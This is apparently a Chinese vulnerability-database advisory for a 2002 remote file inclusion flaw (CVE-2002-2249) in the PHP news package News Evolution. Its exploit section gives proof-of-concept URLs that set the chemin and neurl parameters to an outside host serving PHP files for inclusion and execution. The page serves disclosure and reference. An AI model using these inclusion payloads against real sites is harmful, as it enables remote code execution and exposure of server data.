News Evolution包含未定义变量命令执行漏洞

News Evolution包含未定义变量命令执行漏洞

漏洞ID 1107114 漏洞类型 代码注入
发布时间 2002-11-26 更新时间 2002-12-31
图片[1]-News Evolution包含未定义变量命令执行漏洞-安全小百科CVE编号 CVE-2002-2249
图片[2]-News Evolution包含未定义变量命令执行漏洞-安全小百科CNNVD-ID CNNVD-200212-564
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22048
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-564
|漏洞详情
NewsEvolution2.0版本存在PHP远程文件包含漏洞。远程攻击者可以借助(1)backend.php、(2)screen.php或(3)admin/modules/comment.php的neurl参数执行任意PHP命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/6260/info

News Evolution is a freely available, open source news software package. It is written in PHP, and designed for use on Unix and Linux operating systems.

The problem occurs in the aff_news.php file. By loading this file, and defining the chemin variable to an arbitrary location, commands can be executed on the local host. This vulnerability may also be used to reveal sensitive information on the local host. This same vulnerability also occurs in the export_news.php file.

http://example.com/aff_news.php?chemin=http://example.org/ with

http://example.org/config.php
http://example.org/functions.inc.php
http://example.org/options.inc.php


http://example.com/screen.php?neurl=http://example.org with

http://example.org/admin/cfg/configsql.inc.php
http://example.org/admin/cfg/configscreen.inc.php
http://example.org/admin/cfg/configsite.inc.php
http://example.org/admin/cfg/configtache.inc.php
http://example.org/admin/fonctions/fctscr.php
http://example.org/admin/fonctions/fctadmin.php
http://example.org/admin/fonctions/fctform.php
http://example.org/admin/modules/cache.php
|参考资料

来源:BUGTRAQ
名称:20021126FreeNews&NewsEvolution;(PHP)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=103835200230127&w;=2
来源:XF
名称:newsevolution-php-file-include(10709)
链接:http://xforce.iss.net/xforce/xfdb/10709
来源:BID
名称:6260
链接:http://www.securityfocus.com/bid/6260

相关推荐: Webmin Temporary Insecure File Creation Vulnerability

Webmin Temporary Insecure File Creation Vulnerability 漏洞ID 1102825 漏洞类型 Race Condition Error 发布时间 2001-10-22 更新时间 2001-10-22 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享